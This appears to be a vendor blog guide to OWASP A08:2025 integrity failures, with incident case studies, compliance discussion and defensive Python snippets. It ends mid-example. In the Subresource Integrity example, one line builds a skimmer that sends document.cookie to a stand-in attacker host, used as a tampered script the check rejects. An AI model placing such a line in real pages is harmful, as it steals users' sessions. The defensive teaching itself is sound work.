Last Updated on 31 Mar 2026

OWASP A08:2025 Software or Data Integrity Failures Prevention Guide


Introduction

OWASP Top 10:2025 remains one of the most widely used awareness frameworks for application security, and the 2025 release keeps its focus on the risks that most often turn into real operational damage. In the official 2025 list, A08:2025 Software or Data Integrity Failures remains at number eight, with a clarified name and a sharper emphasis on trust boundaries, artifact integrity, and the dangerous assumption that updates, packages, scripts, and serialized data are trustworthy just because they appear to come from familiar sources.



This matters well beyond classic software security. When software integrity fails, the fallout often becomes fraud, account takeover, bot abuse, malicious session reuse, payment theft, and silent business logic manipulation. OWASP maps 14 CWEs to this category and reports a max incidence rate of 8.98%, an average incidence rate of 2.75%, 501,327 total occurrences, and 3,331 CVEs, which makes A08 a broad operational trust problem rather than a narrow developer bug class.

The scale of the problem is reinforced by the modern dependency ecosystem. Sonatype's 2024 software supply chain report counted 704,102 malicious open source packages discovered since 2019, and its follow-up malware research reported a 156% year over year increase in malicious packages identified over the preceding year. Those figures show why integrity failures now sit much closer to everyday development and deployment than many teams still assume.

For CrossClassify readers, the strategic takeaway is simple: A08 is not only about preventing tampered code from entering production. It is also about reducing the blast radius when trust is broken, detecting abnormal runtime behavior quickly, and stopping compromised sessions, fraudulent signups, scripted abuse, and account hijacking before they turn an integrity problem into a business crisis. That is the lens this article uses throughout.

Top 10:2025 List

•

A01:2025 Broken Access Control. This category covers failures that let users act outside their intended permissions, such as horizontal privilege abuse or forced browsing. It remains dangerous because even a small authorization gap can expose large datasets or critical administrative actions.

•

A02:2025 Security Misconfiguration. This risk includes insecure defaults, exposed admin interfaces, unnecessary services, and weak cloud or framework settings. The problem is not just bad code, but systems that are deployed in ways that make exploitation easy.

•



A03:2025 Software Supply Chain Failures. This category focuses on risks in third party components, dependency choices, and upstream software relationships. It overlaps with A08, but A03 is broader at the supply chain level, while A08 is more focused on integrity verification of code and data artifacts themselves.

•

A04:2025 Cryptographic Failures. This covers weak encryption, poor key management, sensitive data exposure, and insecure cryptographic implementation. The risk is not merely compliance failure, but loss of confidentiality, trust, and recoverability after compromise.

•

A05:2025 Injection. Injection remains the class of flaws where untrusted input changes interpreter behavior, such as SQL, OS, or template injection. Its persistence shows that data and commands are still too often mixed in production systems.

•

A06:2025 Insecure Design. This category is about architectural mistakes, weak workflows, and missing abuse case thinking before code is ever written. A secure implementation cannot fully rescue an application whose core trust model is flawed.

•

A07:2025 Authentication Failures. Authentication failures include weak credential handling, poor session security, and identity controls that do not hold up under modern attack patterns. It is especially relevant where attackers pass the login step but still abuse a trusted session afterward.

•

A08:2025 Software or Data Integrity Failures. This category covers trusting software updates, dependencies, scripts, CI artifacts, or serialized data without strong integrity verification. It becomes especially severe when tampered artifacts are then executed or trusted at scale.

•



A09:2025 Security Logging and Alerting Failures. This risk appears when attacks happen but teams do not collect the right evidence, generate useful alerts, or respond in time. In practice, poor telemetry often turns a containable incident into a prolonged breach.

•

A10:2025 Mishandling of Exceptional Conditions. This category covers unsafe behavior during errors, resource exhaustion, unexpected states, and unusual runtime conditions. Systems that fail badly under pressure often reveal internal information or create new attack paths.

Definition and Causes of Software or Data Integrity Failures

OWASP defines Software or Data Integrity Failures as failures in code and infrastructure that allow invalid or untrusted code or data to be treated as trusted and valid. In the 2025 wording, the category specifically focuses on the failure to maintain trust boundaries and verify the integrity of software, code, and data artifacts at a lower level than Software Supply Chain Failures. OWASP highlights notable CWEs including CWE-829 (Inclusion of Functionality from Untrusted Control Sphere), CWE-915 (Improperly Controlled Modification of Dynamically-Determined Object Attributes), and CWE-502 (Deserialization of Untrusted Data), and the category's examples include untrusted plugins, insecure CI pipelines, unsigned updates, and insecure deserialization.

That definition is important because many teams still misread A08 as only a package management issue. It is wider than that. It covers the moment a business accepts code, config, model output, browser script, update package, or serialized object as legitimate without proving authenticity and without maintaining a defensible chain of trust from creation to execution.

The common causes are now well established. Teams pull artifacts from public repositories without strong provenance, trust CI runners and deployment automation that are not properly segmented, embed third party scripts that can alter sessions or payments, and pass serialized state between client and server without adequate integrity protection. In each case, the failure is not merely technical weakness, but misplaced trust in something that should have been continuously verified.

A08 also has a measurable footprint. OWASP's score table for the 2025 release maps 14 CWEs to the category and reports 501,327 total occurrences and 3,331 CVEs, with high exploit and impact weightings. That combination explains why integrity failures remain strategically important even when they do not dominate headlines every week.

Variations of Software or Data Integrity Failures

1. Untrusted repositories, plugins, and CDNs

One of the clearest forms of A08 is using dependencies from untrusted repositories, mirrors, or download sites without verifying provenance and integrity. OWASP explicitly calls out plugins, libraries, modules, repositories, and CDNs as common paths through which invalid code gets treated as trusted.

This is not theoretical. Sonatype reports 704,102 malicious open source packages discovered since 2019, and its 2024 malware report notes a 156% year over year increase in malicious packages, with npm accounting for 98.5% of the malicious packages it identified in the prior year. For organizations investing in software integrity monitoring, trusted package repository security, or secure dependency management, this is one of the strongest real world justifications for internal known good repositories and provenance enforcement.
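To make "verifying integrity" concrete, the idea behind npm's lockfile `integrity` field and pip's `--require-hashes` mode is hash pinning. A digest is recorded when a dependency is first vetted, and any later download whose digest differs, or that was never pinned at all, is refused. The Python sketch below illustrates that rule. The function name `is_pinned_and_intact` and the in-memory artifact are hypothetical; a real pipeline would read pins from a lockfile and hash files on disk.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    """Hex-encoded SHA-256 digest of an artifact's bytes."""
    return hashlib.sha256(data).hexdigest()


def is_pinned_and_intact(name: str, data: bytes, pins: dict[str, str]) -> bool:
    """True only if the artifact has a recorded pin and its digest matches it."""
    expected = pins.get(name)
    if expected is None:
        # Unpinned artifacts are refused instead of being trusted by default.
        return False
    return sha256_hex(data) == expected


# Hypothetical artifact and pin, recorded when the package was first vetted.
vetted = b"module.exports = (s, n) => s.padStart(n);"
pins = {"example-lib-1.0.0.tgz": sha256_hex(vetted)}

print(is_pinned_and_intact("example-lib-1.0.0.tgz", vetted, pins))           # True
print(is_pinned_and_intact("example-lib-1.0.0.tgz", vetted + b"//x", pins))  # False
print(is_pinned_and_intact("unknown-lib-1.0.0.tgz", vetted, pins))           # False
```

Pinning only proves that the bytes are the ones you vetted. It says nothing about whether the vetted version was safe in the first place, which is why the article pairs it with trusted repositories and provenance.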



2. Compromised CI and CD pipelines

A second major variation is compromise inside the build or release process itself. OWASP explicitly warns that insecure CI and CD pipelines can introduce unauthorized access, malicious code, or system compromise when code or artifacts are pulled from untrusted places or used without signature checks.

The blast radius can be enormous. In SolarWinds, GAO states that trojanized code was inserted into Orion updates and that nearly 18,000 customers received a compromised software update, while the Kaseya VSA case documented fewer than 60 direct clients and no more than 1,500 downstream businesses affected through compromised administrative and update flows. These incidents show why pipeline integrity is a board level concern rather than a narrow DevOps hygiene issue.
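One way to close the gap between build and deploy is a promotion gate. The build job records a manifest of artifact digests, and the deploy job recomputes them and refuses anything missing, altered, or unexpected. The sketch below assumes hypothetical names (`promotion_problems`, the manifest dictionary, the artifact names). It catches substitution after the build, but only if the manifest itself is stored or signed somewhere the deploy stage can trust. As SolarWinds shows, it cannot detect tampering that happened before the manifest was written.

```python
import hashlib


def digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def promotion_problems(manifest: dict[str, str], staged: dict[str, bytes]) -> list[str]:
    """Compare staged artifacts with the build manifest and return reasons to block."""
    problems = []
    for name, expected in sorted(manifest.items()):
        if name not in staged:
            problems.append(f"missing: {name}")
        elif digest(staged[name]) != expected:
            problems.append(f"altered: {name}")
    for name in sorted(set(staged) - set(manifest)):
        # Anything that appeared after the build finished is untrusted.
        problems.append(f"unexpected: {name}")
    return problems


# Hypothetical build output and the manifest the build job writes for it.
built = {"app.jar": b"compiled app", "config.yaml": b"replicas: 3"}
manifest = {name: digest(blob) for name, blob in built.items()}

# Between build and deploy, the config is swapped and an extra script appears.
staged = {
    "app.jar": b"compiled app",
    "config.yaml": b"replicas: 3\nimage: attacker/registry",
    "hook.sh": b"extra script",
}
print(promotion_problems(manifest, staged))
# ['altered: config.yaml', 'unexpected: hook.sh']
```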

3. Unverified updates and browser scripts

OWASP also highlights updates downloaded without sufficient integrity verification, especially where a previously trusted application automatically accepts and runs them. The same principle now applies to payment page scripts and browser side components, which is why PCI DSS v4.x added explicit requirements around script authorization, script integrity, and tamper detection for e-commerce environments.

A useful real world signal comes from the Ticketmaster decision. The EDPB published the UK decision showing 9.4 million EEA data subjects were notified as potentially affected, around 60,000 individual card details were compromised, and the regulator concluded Ticketmaster failed to discharge its PCI DSS obligations in relation to the third party chatbot environment. That is a classic A08 pattern: third party functionality was treated as safe without adequate ongoing verification.
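For static browser scripts, the standard integrity mechanism is Subresource Integrity (SRI). The page declares a base64-encoded hash of the expected script in the `integrity` attribute, and the browser refuses to execute a fetched script whose hash differs. The Python sketch below computes an SRI value and roughly emulates the browser's comparison for a single hash. The script contents and the `cdn.example.com` URL are hypothetical. SRI only works for scripts whose exact contents you pin, so frequently changing third party widgets still need the inventory and tamper monitoring that PCI DSS describes.

```python
import base64
import hashlib


def sri_value(script: bytes, algorithm: str = "sha384") -> str:
    """Build an SRI string of the form '<algorithm>-<base64 digest>'."""
    digest = hashlib.new(algorithm, script).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def browser_would_execute(fetched: bytes, integrity: str) -> bool:
    """Rough emulation of the browser check for a single SRI value."""
    algorithm, _, _ = integrity.partition("-")
    return sri_value(fetched, algorithm) == integrity


approved = b"window.checkout = function () { /* approved code */ };"
integrity = sri_value(approved)
# crossorigin is needed so the browser can apply SRI to a cross-origin script.
print(f'<script src="https://cdn.example.com/checkout.js" integrity="{integrity}" crossorigin="anonymous"></script>')

skimmer = approved + b"fetch('https://evil.example/c?d=' + document.cookie);"
print(browser_would_execute(approved, integrity))  # True
print(browser_would_execute(skimmer, integrity))   # False
```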

4. Insecure deserialization and tamperable state

OWASP specifically maps insecure deserialization into A08 and describes the risk of objects or data being encoded into structures an attacker can see and modify. Its example scenario shows a React and Spring Boot architecture passing serialized user state back and forth, which lets an attacker identify the object format and escalate to remote code execution.

This variation matters because it looks deceptively application specific while actually being an integrity failure. The root problem is trusting the authenticity and safety of reconstructed state that originated outside the trust boundary. Even when the exploit chain is technical, the business consequence can become account manipulation, workflow abuse, or fraud at scale if the deserialized object controls entitlements, balances, or session trust.
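The OWASP scenario relies on a recognizable signature. Java serialization streams begin with the bytes `AC ED 00 05`, which appear as `rO0AB` once base64-encoded. The sketch below is a detection heuristic only, under the assumption that request values arrive as standard base64 strings. It flags values that decode to a Java serialization stream so they can be rejected or alerted on. The real fix is to stop deserializing client-supplied objects, or to sign and verify any state that must travel through the client.

```python
import base64

# First four bytes of every Java serialization stream: STREAM_MAGIC (0xACED) + STREAM_VERSION (5).
JAVA_STREAM_HEADER = b"\xac\xed\x00\x05"


def looks_like_java_serialized(value: str) -> bool:
    """Heuristic: does a base64 request value decode to a Java serialization stream?"""
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a subclass of ValueError
        return False
    return raw.startswith(JAVA_STREAM_HEADER)


# Hypothetical captured value: the stream header followed by arbitrary object bytes.
captured = base64.b64encode(JAVA_STREAM_HEADER + b"\x73\x72\x00\x10").decode("ascii")
print(captured[:5])                                     # rO0AB
print(looks_like_java_serialized(captured))             # True
print(looks_like_java_serialized("eyJ1c2VyIjoiYSJ9"))  # False: base64 of a JSON object
```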

5. Inclusion of web functionality from an untrusted source

OWASP's first A08 scenario is especially important for modern web applications. It describes a support subdomain arrangement in which cookies set on the main domain are sent to a support provider, creating a path for cookie theft and session hijacking if the support provider infrastructure is compromised.

This variation is where A08 starts to overlap directly with fraud prevention. A third party script, widget, or support component can preserve the appearance of a valid session while silently shifting trust to an untrusted actor, which is exactly the sort of gap static controls miss. That is why the integrity conversation now belongs not only to AppSec and DevOps, but also to fraud, identity, and risk teams.
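The cookie leak in this scenario follows from the domain-matching rule in RFC 6265. A cookie set with `Domain=mycompany.example` is sent to that domain and every subdomain, including a subdomain that is DNS-mapped to a vendor. A host-only cookie, set without a `Domain` attribute, goes back only to the exact host that set it. The sketch below implements a simplified version of that rule. The host names are hypothetical, and real browsers apply further checks, such as the public suffix list and IP address handling.

```python
from typing import Optional


def cookie_sent_to(request_host: str, cookie_domain: Optional[str], set_by_host: str) -> bool:
    """Simplified RFC 6265 rule for whether a browser attaches a cookie to a request."""
    request_host = request_host.lower()
    if cookie_domain is None:
        # Host-only cookie: sent back only to the exact host that set it.
        return request_host == set_by_host.lower()
    domain = cookie_domain.lower().lstrip(".")  # a leading dot is ignored
    # Domain cookie: sent to the domain itself and to every subdomain of it.
    return request_host == domain or request_host.endswith("." + domain)


vendor_host = "support.mycompany.example"  # hypothetically mapped to a support vendor

# A session cookie scoped to the parent domain leaks to the vendor-controlled host.
print(cookie_sent_to(vendor_host, "mycompany.example", "www.mycompany.example"))  # True
# A host-only session cookie stays with the application host.
print(cookie_sent_to(vendor_host, None, "www.mycompany.example"))                 # False
```

The practical takeaway is that authentication cookies should be host-only, or scoped to the narrowest domain that needs them, whenever any subdomain is operated by a third party.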

Real Examples of Software or Data Integrity Failures

SolarWinds Orion compromise, 2020

SolarWinds remains the canonical modern case. GAO says a threat actor injected trojanized code into a file included in Orion software updates, and Microsoft's technical analysis states the malicious code was inserted into SolarWinds.Orion.Core.BusinessLayer.dll, likely early enough in the build process that the tampered DLL was still digitally signed and therefore harder to distinguish from legitimate code. SolarWinds later said up to 18,000 customers could potentially have been vulnerable based on downloads of the affected Orion versions.

The key lesson is not just "supply chain attack." The more precise lesson is that the traditional trust signals (signed code, expected vendor origin, routine update channels, and enterprise deployment workflows) all remained intact from the customer's perspective while integrity had already been lost. For A08, that is the nightmare scenario: malicious code inherits the credibility of the trusted process that delivered it.

Kaseya VSA ransomware attack, 2021

The Kaseya case demonstrates how administrative channels and update mechanisms can become force multipliers. The U.S. National Counterintelligence and Security Center summary says attackers leveraged Kaseya VSA to release a fake update that propagated malware through MSP clients to downstream companies, affecting fewer than 60 direct clients and no more than 1,500 businesses supported by them. Reuters separately reported a $70 million ransom demand tied to the incident.

For A08 analysis, the importance lies in trusted command paths. When a platform designed to push updates and administrative actions is compromised, downstream organizations receive malicious payloads through precisely the workflow they are trained to trust. That makes Kaseya a powerful example of why integrity controls need both cryptographic rigor and runtime detection around unusual delivery behavior.

Maersk and NotPetya through M.E.Doc, 2017

The NotPetya incident shows how devastating update server compromise can become when a widely trusted regional software component is weaponized. The U.S. Department of Justice indictment states that the conspirators disseminated NotPetya using the Ukrainian accounting software M.E.Doc by modifying update files and rerouting traffic from machines attempting to update the software, while the White House later said NotPetya caused billions of dollars in damage globally. Reporting on Maersk's case put the company's losses in the $250 million to $300 million range.

This example matters because it collapses the false separation between software integrity and operational resilience. Once the update path is compromised, the attack moves instantly from a software trust problem to a business continuity, legal, and geopolitical problem. In other words, A08 is often where technical trust failure becomes enterprise level shock.

Regulatory Compliance of Software or Data Integrity Failures

From a GDPR perspective, A08 connects directly to the principle of integrity and confidentiality and to the Article 32 security of processing obligations. The Ticketmaster decision sets out the GDPR fine tiers clearly. For certain serious infringements, fines can reach up to €20 million or 4% of worldwide annual turnover. For Article 32 security failures, they can reach up to €10 million or 2% of worldwide annual turnover. For an undertaking, each cap is whichever of the two amounts is higher. That means weak software integrity controls are not just engineering gaps; they can become statutory security failures once personal data is exposed or manipulated.
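Under Article 83(4) and 83(5), the cap for an undertaking is the fixed amount or the turnover percentage, whichever is higher, so the ceiling grows with company size. The small sketch below makes that arithmetic visible using hypothetical turnover figures. It computes statutory maximums only, not the fine a regulator would actually impose. The tier labels are assumptions for illustration.

```python
def gdpr_fine_cap(worldwide_turnover_eur: int, tier: str) -> int:
    """Statutory maximum for an undertaking: fixed amount or % of turnover, whichever is higher."""
    tiers = {
        "art83_4": (10_000_000, 2),  # e.g. Article 32 security of processing
        "art83_5": (20_000_000, 4),  # e.g. basic principles (Article 5), data subject rights
    }
    fixed_cap, percent = tiers[tier]
    return max(fixed_cap, worldwide_turnover_eur * percent // 100)


for turnover in (100_000_000, 2_000_000_000):  # hypothetical annual turnovers in EUR
    print(turnover, gdpr_fine_cap(turnover, "art83_4"), gdpr_fine_cap(turnover, "art83_5"))
# 100000000 10000000 20000000
# 2000000000 40000000 80000000
```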

Ticketmaster is the clearest A08 adjacent enforcement example in the material reviewed here. The decision imposed a £1,250,000 penalty, recorded 9.4 million EEA data subjects as potentially affected and around 60,000 compromised card details, and explicitly stated that Ticketmaster failed to discharge its PCI DSS obligations in relation to the third party chatbot setup. That combination makes the case especially useful for explaining how browser script integrity, third party risk, payment page security, GDPR, and PCI DSS intersect in practice.

PCI DSS is equally relevant wherever payment pages, third party scripts, or checkout flows are involved. PCI SSC's 2025 guidance says PCI DSS v4.x Requirements 6.4.3 and 11.6.1 focus on ensuring payment page scripts are authorized, checked for integrity, and monitored for tampering. The SAQ A-EP language requires a method to confirm each script is authorized, a method to assure the integrity of each script, and an inventory with written justification for each script. That is a direct compliance translation of the A08 principle that trusted execution must be backed by trusted provenance and ongoing integrity assurance.
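The script requirements can be read as three checks per script: is it authorized, is its integrity assured, and does it have a written justification. The sketch below models a hypothetical inventory as a Python dictionary and reports which scripts observed on a payment page fail those checks. The `ScriptRecord` schema, the URLs, and the way scripts are observed (for example a crawler or CSP reports) are assumptions. Re-running a comparison like this on a schedule is a simplified take on the tamper detection idea, not a complete implementation of either requirement.

```python
import hashlib
from dataclasses import dataclass


@dataclass
class ScriptRecord:
    """One inventory entry (hypothetical schema)."""
    sha256: str          # hash of the approved script contents
    justification: str   # written business or technical reason for the script


def audit_payment_page(inventory: dict[str, ScriptRecord],
                       observed: dict[str, bytes]) -> list[str]:
    """Flag scripts that are unauthorized, unjustified, or changed since approval."""
    findings = []
    for url, body in sorted(observed.items()):
        record = inventory.get(url)
        if record is None:
            findings.append(f"unauthorized script: {url}")
            continue
        if not record.justification.strip():
            findings.append(f"no written justification: {url}")
        if hashlib.sha256(body).hexdigest() != record.sha256:
            findings.append(f"integrity change detected: {url}")
    return findings


checkout_js = b"/* approved checkout code */"
inventory = {
    "https://shop.example/js/checkout.js": ScriptRecord(
        hashlib.sha256(checkout_js).hexdigest(), "Renders the card form"),
    "https://chat.example/widget.js": ScriptRecord(
        hashlib.sha256(b"/* chat v1 */").hexdigest(), ""),
}
observed = {
    "https://shop.example/js/checkout.js": checkout_js,
    "https://chat.example/widget.js": b"/* chat v2, silently updated */",
    "https://unknown.example/x.js": b"/* unknown origin */",
}
for finding in audit_payment_page(inventory, observed):
    print(finding)
```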

In practice, public GDPR penalties are easier to verify than PCI DSS monetary consequences, because GDPR enforcement is published by regulators while many PCI consequences flow contractually through acquiring banks and card brands. Even so, the compliance direction is clear: if your application handles personal data, payment data, or both, software integrity failures can quickly become reportable incidents, audit issues, remediation costs, and public enforcement events.

Protection and Prevention Methods for Software or Data Integrity Failures

1. Digital signatures

Digital signatures verify that software or data came from the expected source and was not altered after signing. OWASP puts this first in its prevention list because it is the cleanest way to stop silent tampering in transit or at distribution time.

This control should be applied by release engineering, platform engineering, AppSec, vendor management, and any team distributing updates, mobile packages, browser scripts, or downloadable artifacts. It is highly effective against artifact substitution and unauthorized modification, but only when signing keys, signing workflows, and provenance records are themselves protected. SolarWinds is the reminder that a signature on its own is not enough if the build process that produces the signed artifact is already compromised.

The main advantage is strong cryptographic evidence of origin and integrity. The main limitation is that a signature only proves an artifact has not changed since it was signed, not that the process which produced it was trustworthy. Teams therefore need signing plus build hardening, provenance attestations, and runtime monitoring.
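Because a valid signature says nothing about how an artifact was built, teams often add a policy check on provenance. That check asks which builder produced the artifact, from which repository and branch, and for which digest. The sketch below applies such a policy to a simplified, hypothetical attestation dictionary. Real formats such as SLSA provenance carried in in-toto statements are richer. The example also assumes the attestation's own signature has already been verified with your signing tooling.

```python
import hashlib

# Hypothetical policy: only this CI builder, repository, and branch may produce releases.
POLICY = {
    "builder_id": "https://ci.example.com/builders/hardened-runner",
    "source_repo": "https://git.example.com/acme/payments",
    "source_ref": "refs/heads/main",
}


def provenance_violations(artifact: bytes, attestation: dict) -> list[str]:
    """Check a (pre-verified) provenance record against policy and the artifact bytes."""
    violations = [
        f"{field}: {attestation.get(field)!r} is not allowed"
        for field, allowed in POLICY.items()
        if attestation.get(field) != allowed
    ]
    if attestation.get("subject_sha256") != hashlib.sha256(artifact).hexdigest():
        violations.append("subject digest does not match the artifact")
    return violations


release = b"payments-service build 412"
attestation = {
    "builder_id": POLICY["builder_id"],
    "source_repo": POLICY["source_repo"],
    "source_ref": "refs/heads/hotfix-unreviewed",  # built from an unprotected branch
    "subject_sha256": hashlib.sha256(release).hexdigest(),
}
print(provenance_violations(release, attestation))
# ["source_ref: 'refs/heads/hotfix-unreviewed' is not allowed"]
```

Provenance narrows the question from "is this signed?" to "was this signed output of the build we expect?" It still depends on the builder itself being hardened, which is why the article pairs it with CI and CD segregation.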

2. Trusted repositories and internal known good mirrors

OWASP recommends consuming libraries and dependencies only from trusted repositories and, for higher risk profiles, hosting an internal known good repository. This reduces the chance of pulling malicious or typosquatted packages directly from public ecosystems without sufficient vetting.

This control belongs primarily to software engineering leadership, platform teams, package governance owners, and procurement or vendor assurance teams. It is especially effective in environments with many developers, many microservices, or heavy JavaScript and Python usage, where package volume and release speed can overwhelm manual verification. The Sonatype data on hundreds of thousands of malicious packages and rapid growth in open source malware makes the business case very strong.

The advantage is reduced exposure to hostile upstream content and more consistent governance. The limitation is operational overhead: internal mirrors, package allow lists, provenance checks, and emergency exception handling all require sustained ownership.
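A mirror-only policy is easy to state and easy to drift from, so teams often enforce it mechanically on the download URLs a lockfile records. The sketch below checks hypothetical resolved entries against an allowed internal registry host. It also uses the standard library's `difflib` to flag names suspiciously close to approved packages, which is a crude typosquat signal. The registry host, the package lists, and the 0.85 similarity cutoff are illustrative assumptions.

```python
import difflib
from urllib.parse import urlparse

ALLOWED_REGISTRY_HOSTS = {"npm.internal.example.com"}  # hypothetical internal mirror
APPROVED_PACKAGES = ["express", "lodash", "react"]      # hypothetical allow list


def dependency_findings(resolved: dict[str, str]) -> list[str]:
    """resolved maps each package name to the URL it was downloaded from."""
    findings = []
    for name, url in sorted(resolved.items()):
        host = urlparse(url).hostname
        if host not in ALLOWED_REGISTRY_HOSTS:
            findings.append(f"{name}: fetched from non-approved host {host}")
        if name not in APPROVED_PACKAGES:
            close = difflib.get_close_matches(name, APPROVED_PACKAGES, n=1, cutoff=0.85)
            if close:
                findings.append(f"{name}: possible typosquat of {close[0]}")
            else:
                findings.append(f"{name}: not on the approved list")
    return findings


resolved = {
    "express": "https://npm.internal.example.com/express/-/express-4.19.2.tgz",
    "expresss": "https://registry.npmjs.org/expresss/-/expresss-1.0.0.tgz",
}
for line in dependency_findings(resolved):
    print(line)
# expresss: fetched from non-approved host registry.npmjs.org
# expresss: possible typosquat of express
```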



3. Review processes for code and configuration changes

OWASP also recommends a review process for code and configuration changes so malicious or unsafe changes are less likely to enter the pipeline unnoticed. This control is often dismissed as basic hygiene, but in A08 it functions as a trust checkpoint between intention and deployment.

The teams that should apply it include developers, release managers, infrastructure engineers, SRE, and security reviewers. It is moderately to highly effective when combined with protected branches, change approvals, environment segregation, and auditability. Its weakness is human inconsistency: reviews can miss subtle malicious changes, especially in fast moving teams or when reviewers lack supply chain and integrity training.
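Review policy is easier to audit when it is enforced by code rather than convention. The sketch below encodes two hypothetical rules. First, every change needs approval from someone other than its author. Second, changes touching pipeline or deployment definitions also need a designated security reviewer. The path prefixes and reviewer names are assumptions. In practice this logic usually lives in a code hosting platform's branch protection and code owner settings.

```python
from dataclasses import dataclass, field

SENSITIVE_PREFIXES = (".ci/", "deploy/", "Dockerfile")  # hypothetical sensitive paths
SECURITY_REVIEWERS = {"sec-alice", "sec-bob"}           # hypothetical security team


@dataclass
class Change:
    author: str
    files: list[str]
    approvals: set[str] = field(default_factory=set)


def merge_blockers(change: Change) -> list[str]:
    """Return the reasons this change may not merge yet (an empty list means allowed)."""
    blockers = []
    independent = change.approvals - {change.author}  # self-approval does not count
    if not independent:
        blockers.append("needs approval from someone other than the author")
    touches_pipeline = any(path.startswith(SENSITIVE_PREFIXES) for path in change.files)
    if touches_pipeline and not (independent & SECURITY_REVIEWERS):
        blockers.append("pipeline or deploy change needs a security reviewer")
    return blockers


change = Change(author="dev-carol", files=["src/app.py", ".ci/build.yml"],
                approvals={"dev-carol", "dev-dan"})
print(merge_blockers(change))
# ['pipeline or deploy change needs a security reviewer']
```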

4. CI and CD segregation and access control

OWASP explicitly calls for CI and CD pipelines to have proper segregation, configuration, and access control. This means isolating roles, minimizing privileged identities, restricting who can change build logic, protecting secrets, separating environments, and ensuring artifacts move through controlled promotion paths rather than ad hoc trust jumps.

This control should be driven by DevOps, platform security, cloud security, IAM owners, and engineering leadership. It is extremely effective because it protects the point where reviewed source code becomes a deployable artifact that everyone downstream trusts. The historical record from SolarWinds and Kaseya shows that once the delivery mechanism is compromised, every downstream security control becomes harder to rely on.

The advantage is that it reduces both the chance and the scale of compromise. The limitation is complexity: CI and CD hardening often spans source control, runners, artifact storage, secrets, cloud roles, and deployment orchestration.
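A quick way to test segregation is to look for identities that hold incompatible permissions. One example is the ability to both edit build logic and deploy to production. Another is a job that runs unreviewed pull request code but can also read production secrets. The permission names and identities below are hypothetical. The point of the sketch is that separation of duties can be checked continuously from an export of pipeline roles instead of being assumed.

```python
# Hypothetical permission export: identity -> permissions it holds in the pipeline.
GRANTS = {
    "ci-runner-pr": {"run_jobs", "read_prod_secrets"},
    "ci-runner-release": {"run_jobs", "publish_artifacts"},
    "deploy-bot": {"deploy_prod"},
    "dev-erin": {"edit_pipeline", "deploy_prod"},
}

# Permission sets that should never be held by the same identity.
TOXIC_COMBINATIONS = [
    ({"edit_pipeline", "deploy_prod"}, "can change build logic and ship it to production"),
    ({"edit_pipeline", "publish_artifacts"}, "can change build logic and publish its output"),
]
UNTRUSTED_RUNNERS = {"ci-runner-pr"}  # executes code from unreviewed pull requests


def segregation_findings(grants: dict[str, set[str]]) -> list[str]:
    findings = []
    for identity, perms in sorted(grants.items()):
        for combo, why in TOXIC_COMBINATIONS:
            if combo <= perms:  # identity holds every permission in the combination
                findings.append(f"{identity}: {why}")
        if identity in UNTRUSTED_RUNNERS and "read_prod_secrets" in perms:
            findings.append(f"{identity}: untrusted code path can read production secrets")
    return findings


for finding in segregation_findings(GRANTS):
    print(finding)
# ci-runner-pr: untrusted code path can read production secrets
# dev-erin: can change build logic and ship it to production
```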

5. Integrity checks for serialized data and state

OWASP's final prevention point is that unsigned or unencrypted serialized data from untrusted clients should not be accepted without integrity checks or digital signatures to detect tampering or replay. This is the most application specific of the A08 controls, but it is vital because state passed through the client is often treated as if it retained server side trust.

Backend engineers, API architects, mobile developers, identity teams, and product security teams should apply this control wherever tokens, claims, state payloads, shopping context, price context, or privilege context move outside the server trust boundary. It is highly effective against tampering and replay if implemented correctly, but weak if teams assume encryption alone proves authenticity. In commercial environments, this is one of the clearest places where application security, fraud control, and identity engineering should work as one team.

Protection Tools for Software or Data Integrity Failures

Dynamic Application Security Testing, or DAST, remains useful in an A08 program, but its value must be understood correctly. OWASP describes DAST as black box testing against a running application and notes that it is especially helpful for input and output validation, authentication issues, and server configuration mistakes. That makes it useful for externally visible consequences of integrity failure, such as suspicious endpoints, exploitable states, unsafe deserialization surfaces, and browser side weaknesses that become reachable in production.

Who should use DAST? AppSec teams, QA security specialists, external testers, and engineering teams responsible for pre-production validation should all use it. It is particularly effective at discovering exploitable runtime behaviors that static code reviews may miss, but it does not prove where code came from, whether a package was trustworthy, or whether a release artifact was altered inside the pipeline.

That limitation matters for A08. OWASP's software supply chain guidance warns that even SAST results are not comprehensive and require manual verification, and the same strategic warning applies here: scanning tools help, but they do not replace repository trust, artifact signing, provenance, change review, or CI and CD hardening. For A08, DAST is best treated as a detective and validation layer inside a broader integrity assurance program.

The Gap That Still Exists After Signed Builds and Basic Integrity Controls

Here is the real gap. Cryptographic integrity controls answer the question, "Did this software or data arrive as expected?" They do not fully answer, "Is the entity using it now still trustworthy, behaving normally, and operating within an acceptable risk context?" That second question becomes essential once an attacker finds any path around preventive controls, whether through third party scripts, compromised sessions, malicious browser automation, or valid credentials riding on a tampered client environment.

This is why the strongest A08 strategy is not prevention alone. You still need signing, provenance, trusted repositories, and hardened CI pipelines, but you also need a runtime trust model that continuously evaluates who is acting, from what device, in what context, and with what behavioral pattern. That is the space where CrossClassify becomes useful, not as a replacement for software integrity controls, but as a detection and decision layer when static trust assumptions no longer hold.



Zero Trust Architecture and Continuous Adaptive Risk and Trust Assessment

Zero Trust Architecture starts with a premise that maps cleanly to A08: nothing should be trusted by default, including internal actors, familiar devices, previously approved sessions, or apparently legitimate artifacts. CrossClassify's Zero Trust article frames ZTA as a model for online data, applications, and accounts in which threats may exist both inside and outside traditional boundaries, while its CARTA article extends that model through continuous, context aware risk assessment during the session rather than only at entry.

A practical overview appears in Zero Trust Architecture and Modern AI Cybersecurity, where Zero Trust is presented as a foundation for modern digital defense. That matters for A08 because software integrity failures often begin with a mistaken assumption that a source, artifact, or session can continue to be trusted after one successful check.

The complementary model appears in Continuous Adaptive Risk and Trust Assessment, where CARTA is described as monitoring behavior and risk throughout the session and adapting controls in real time. In A08 terms, this helps organizations react when a tampered component, rogue script, or manipulated session still carries valid credentials or otherwise looks acceptable to static perimeter controls.

The key strategic point is that ZTA and CARTA are not in conflict with OWASP's preventive guidance. They operationalize it. OWASP tells you to verify integrity before trust is granted, while ZTA and CARTA make that verification a living process that continues after deployment and after login, which is exactly where many modern integrity failures start causing business damage.
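To illustrate what "continuous" means in practice, the sketch below re-scores risk on every sensitive in-session event rather than only at login, and maps the score to allow, step-up, or block. The signal names, weights, and thresholds are hypothetical placeholders chosen for readability. They are not CrossClassify's scoring model or any product's API.

```python
from dataclasses import dataclass

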